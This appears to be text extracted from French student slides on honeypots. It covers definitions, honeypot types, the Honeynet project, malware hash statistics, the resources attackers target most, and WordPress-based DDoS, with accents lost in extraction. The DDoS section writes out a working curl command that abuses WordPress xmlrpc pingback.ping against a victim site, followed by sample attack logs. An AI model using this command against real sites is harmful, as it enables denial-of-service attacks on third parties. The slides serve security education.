Honeypots

Know yourself and know your enemies, and of a hundred battles you will
have a hundred victories. -Sun Tzu The Art of War

Ralis par: Sami Ayt Ali

Plan

Dfinition

Buts des honeypots

Avantages face un simple IDS

Les types de Honeypots

Honeynet project

Application

Dfinition

A honeypot is security resource whose value lies in being probed, attacked or

compromised. Lance Spitzner

A honeypot is a resource which pretends to be a real target. A honeypot is expected

to be attacked or compromised. The main goals are the distraction of an attacker and
the gain of information about an attack and the attacker. Baumann Reto

An Internet-attached server that acts as a decoy, luring in potential hackers in order

to study their activities and monitor how they are able to break into a system.
Honeypots are designed to mimic systems that an intruder would like to break into
but limit the intruder from having access to an entire network. If a honeypot is
successful, the intruder will have no idea that s/he is being tricked and monitored.
R.C. Barnett de sourceforge.net

En gnral les pots de miel sont des machines physiques ou virtuelles destine tre
attaques afin de collecter le plus dinformations sur les techniques dintrusion ou
lidentit des pirates.

Buts

Forensics : analyser les nouvelles attaques et exploits

Trend analysis : observer les changements des types et techniques

dattaques avec le temps

Identification : identifier les pirates et les tracker jusqu leur machines

afin de connaitre leur identits

Sociologie : apprendre sur les groups de black-hats en espionnant leurs

email ou trafic IRC qui peut circuler sur le honeypot

Avantages face un simple IDS

Pourquoi ne pas mettre un simple systme de dtection dintrusions

en amont du rseau de production la place dun honeynet?

un IDS ne dtecte que les attaques connues (faux ngatifs) et produit

de nombreux faux positifs

Les pots de miel permettent de palier ces deux problmes:

comme le trafic circulant lintrieur de lhoneynet na pas lieu

dtre, on peut le considrer automatiquement comme suspect et
ainsi supprimer les faux positifs.

De plus comme nous laissons entrer le pirate, nous pouvons analyser

lattaque quil a conduite mme si celle-ci tait jusqualors inconnue

Peut aussi tre utilis comme outil prventif avant quun systme rel
de production ne soit atteint

Les types de Honeypots

Honeypots de production

Honeypots de recherche

Honeypots faible interaction

Honeypots moyenne interaction

Honeypots haute interaction

Les types de Honeypots

Honeypots de production: utilis pour drouter les attaques vers des

machines leurres qui simulent un rseau de production. Ce type de
honeypot ne requiert pas beaucoup de vigilance de la part de
ladministrateur. Il doit uniquement surveiller les intrusions sur les
machines leurres afin de sassurer que les failles exploites ne sont pas
prsentes sur les machines de production relles.

Honeypots de recherche: Le rle du honeypot dans un environnement de

recherche est dobserver les mthodes de piratage et tudier le
comportement des pirates. Ce type de honeypot est plus difficile
mettre en place et requiert un suivi constant si on ne veut pas avoir de
mauvaises surprises.

Honeypots faible interaction

Emule des faux services vulnrables qui ne

rpondent aucune requte

Le pirate ninteragit jamais avec le systme

dexploitation en lui mme et la scurit est
ainsi conserve

Utile pour relever des statistiques sur les

services les plus attaqus

Honeypot moyenne interaction

Evolution des honeypots prsents

prcdement dans le sens o ils rpondent au
pirate avec des fausses rponses qui laissent
croire au pirate que la faille est bien prsente et
quelle a t exploite avec succs.

Honeypots forte interaction

Reposent sur un vrai systme dexploitation

o de vritables services tournent et sont
accessibles aux pirates

Permettent de rellement tudier le

comportement des pirates

Les plus adapts pour la recherche

Les plus difficiles administrer

Honeynet project

Organisation international de recherche scurit apparu en 1999

Ddie investiguer les dernires attaques, dvelopper des outils de

scurit open source, apprendre le comportement des hackers et
sensibiliser sur les menaces existantes sur internet

Le projet utilise des machines normales sans vulnrabilits offertes et

surveille le rseau pour dtecter des attaques

Le projet de recherche publie des informations critiques sur les

attaquants et les techniques quils utilisent, ainsi que leur motif et les
actions quils excutent aprs stre infiltr.

Ces informations sont publies sur les pages blanches Know Your
Enemy, sur les blogs ou via les challenges Scan of the Month

Rseau dInstallations de Glastopf (fait partie du rseau

Honeynet)

Quelques attaques detectes par

Honeynet project

Remote File Inclusion (RFI) est une vulnrabilit trouve sur les sites web
permettant dinjecter un fichier distance, le plus souvent grce un script
sur le serveur web. Cest du au fait dutiliser des champs dentres pour les
utilisateurs sans une validation approprie. Ceci peut conduire des failles
aussi srieuses que lexcution de code sur le serveur web.
Hash

Hits

VirusTotal detection ratio

30a7bb30303f7da9ad102edc313dc80e

929

0 / 52

ab4d03072cc0532afc83d13854ed7e4f

577

22 / 49

474c4daeff3d82ae49d7c96acb8c0d84

514

21 / 53

9f67913d2c77545a4187053ad18230e4

496

7 / 52

369aab6f3a40d0259e6b036b68c27d25

411

7 / 54

10b5c4f77bbd80a3886e591dc3426198

267

N/A

6427bb17f4922b82c0147099429cfef9

203

3 / 53

be52cd4e8a8f6e42418c87d3468bba20

191

9 / 51

f922514cec9b9dc9c74b99ce9e39d3bc

164

15 / 53

46f5757064a2a0a081d6fd099f2916b5

159

18 / 46

Liste des ports les plus cibl

Liste des ressources les plus cibles

Resource

Count

admin

467194

administrator/index.php

73285

changes.html

13193

wp-login.php

11248

awstats/awstats.pl

9961

robots.txt

8620

xmlrpc.php

8175

index.php?app=core&module=global&section=login&do=process

7339

phpMyAdmin-2.5.5/index.php

3738

phpMyAdmin-2.5.5-pl1/index.php

3712

awstats/awstats.pl?framename=mainright&output=refererpages

3538

Attaques DDoS bass sur WordPress

Pingback.ping

Exploitation

$ curl -D - "www.anywordpresssite.com/xmlrpc.php" -d
'<methodCall><methodName>pingback.ping</methodName><params><param><value><string
>http://victim.com</string></value></param><param><value><string>www.anywordpresssite.c
om/postchosen</string></value></param></params></methodCall>

Exemple dune attaque DDOS

74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-"

"WordPress/3.8; http://www.mtbgearreview.com"

121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-"

"WordPress/3.4.2; http://www.kschunvmo.com"

217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-"

"WordPress/3.8.1; http://www.intoxzone.fr"

193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-"

"WordPress/2.9.2; http://www.verwaltungmodern.de"

..

Bibliographie

[1] L. Spitzner, Honeypots: Tracking Hackers. Addislon-Wesley, ISBN

from-321-10895-7, 2002

[2] R. Baumann. White Paper: Honeypots. February 2002. Available

online: http://security.rbaumann.net/download/whitepaper.pdf

[3] Sourceforge home page: http://honeypots.sourceforge.net/

[4] www.honeynet.org/

[5] http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sitesused-for-distributed-denial-of-service-attack.html

[6] wikipedia.org/

Application